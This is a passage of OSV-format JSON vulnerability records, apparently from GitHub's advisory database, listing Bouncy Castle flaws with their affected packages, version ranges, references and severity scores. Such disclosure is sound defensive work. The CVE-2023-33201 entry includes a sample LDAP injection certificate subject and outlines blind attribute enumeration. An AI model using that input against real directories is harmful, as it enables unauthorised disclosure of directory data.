LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bctls-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bctls-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.78" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73", "1.74", "1.75", "1.76", "1.77" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2.5" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.2", "1.0.2.1", "1.0.2.3", "1.0.2.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1", "1.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.3.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } }, { "package": { "name": "BouncyCastle.Cryptography", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle.Cryptography" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.3.1" } ] } ], "versions": [ "2.0.0", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.3.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-8xfc-gm6g-vgpv/GHSA-8xfc-gm6g-vgpv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29857" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/commit/56daa6eac526f165416d17f661422d60de0dfd63" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/efc498ca4caa340ac2fe11f2efee06c1a294501f" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/fee80dd230e7fba132d03a34f1dd1d6aae0d0281" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9029857" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9029857" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241206-0008" }, { "type": "WEB", "url": "https://www.bouncycastle.org/latest_releases.html" } ], "database_specific": { "cwe_ids": [ "CWE-125", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-05-14T20:22:01Z", "nvd_published_at": "2024-05-14T15:17:02Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9gp4-qrff-c648", "published": "2018-10-18T18:04:13Z", "modified": "2025-09-12T20:11:27.017633Z", "aliases": [ "CVE-2016-1000345" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the DHIES/ECIES CBC mode vulnerable to padding oracle attack. For BC 1.55 and older, in an environment where timings can be easily observed, it is possible with enough observations to identify when the decryption is failing due to padding.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-9gp4-qrff-c648/GHSA-9gp4-qrff-c648.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000345" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/21dcb3d9744c83dcf2ff8fcee06dbca7bfa4ef35#diff-4439ce586bf9a13bfec05c0d113b8098" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-9gp4-qrff-c648" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:28:32Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c8xf-m4ff-jcxj", "published": "2018-10-17T16:23:38Z", "modified": "2025-09-12T20:11:29.725840Z", "aliases": [ "CVE-2016-1000339" ], "summary": "Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the primary engine class used for AES was AESFastEngine. Due to the highly table driven approach used in the algorithm it turns out that if the data channel on the CPU can be monitored the lookup table accesses are sufficient to leak information on the AES key being used. There was also a leak in AESEngine although it was substantially less. AESEngine has been modified to remove any signs of leakage (testing carried out on Intel X86-64) and is now the primary AES class for the BC JCE provider from 1.56. Use of AESFastEngine is now only recommended where otherwise deemed appropriate.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-c8xf-m4ff-jcxj/GHSA-c8xf-m4ff-jcxj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000339" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b#diff-54656f860db94b867ba7542430cd2ef0" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/8a73f08931450c17c749af067b6a8185abdfd2c0#diff-494fb066bed02aeb76b6c005632943f2" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c8xf-m4ff-jcxj" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:37Z", "nvd_published_at": "2018-06-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fjqm-246c-mwqg", "published": "2018-10-17T16:27:28Z", "modified": "2025-09-12T20:11:33.148189Z", "aliases": [ "CVE-2016-1000346" ], "summary": "In Bouncy Castle JCE Provider the other party DH public key is not fully validated", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier the other party DH public key is not fully validated. This can cause issues as invalid keys can be used to reveal details about the other party's private key where static Diffie-Hellman is in use. As of release 1.56 the key parameters are checked on agreement calculation.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fjqm-246c-mwqg/GHSA-fjqm-246c-mwqg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000346" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/1127131c89021612c6eefa26dbe5714c194e7495#diff-d525a20b8acaed791ae2f0f770eb5937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-fjqm-246c-mwqg" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181127-0004" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:48Z", "nvd_published_at": "2018-06-04T21:29:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hr8g-6v94-x4m9", "published": "2023-07-05T03:30:23Z", "modified": "2024-10-22T05:28:49.779895Z", "aliases": [ "CGA-9v29-fwrv-3vmr", "CVE-2023-33201" ], "related": [ "CGA-38pq-3m5v-j985", "CGA-g7rp-wcpp-h755", "CGA-h3hg-g6x6-9xjh", "CGA-w3f3-pcfm-c69g" ], "summary": "Bouncy Castle For Java LDAP injection vulnerability", "details": "Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure.\n\nA potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user.\n\nChanges to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.71.1", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.53", "1.54", "1.56", "1.57", "1.58", "1.60", "1.64", "1.65", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.64", "1.67", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "fixed": "1.74" } ] } ], "versions": [ "1.55", "1.59", "1.60", "1.64", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.64", "1.68", "1.69", "1.70", "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk18on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk18on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.74" } ] } ], "versions": [ "1.71", "1.72", "1.73" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } }, { "package": { "name": "org.bouncycastle:bcprov-debug-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-debug-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.49" }, { "last_affected": "1.70" } ] } ], "versions": [ "1.52", "1.53", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.66", "1.67", "1.68", "1.69", "1.70" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hr8g-6v94-x4m9/GHSA-hr8g-6v94-x4m9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33201" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/ccf93ca736b89250ff4ce079a5aa56f5cbf0ebbd" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/e8c409a8389c815ea3fda5e8b94c92fdfe583bcc" }, { "type": "WEB", "url": "https://bouncycastle.org" }, { "type": "WEB", "url": "https://bouncycastle.org/releasenotes.html#r1rv74" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commits/main/prov/src/main/java/org/bouncycastle/jce/provider/X509LDAPCertStoreSpi.java" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2023-33201" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230824-0008" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T15:40:29Z", "nvd_published_at": "2023-07-05T03:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qcj7-g2j5-g7r3", "published": "2018-10-17T16:24:12Z", "modified": "2025-09-02T21:09:14.819658Z", "aliases": [ "CVE-2016-1000342" ], "summary": "In Bouncy Castle JCE Provider ECDSA does not fully validate ASN.1 encoding of signature on verification", "details": "In the Bouncy Castle JCE Provider version 1.55 and earlier ECDSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qcj7-g2j5-g7r3/GHSA-qcj7-g2j5-g7r3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000342" }, { "type": "WEB", "url": 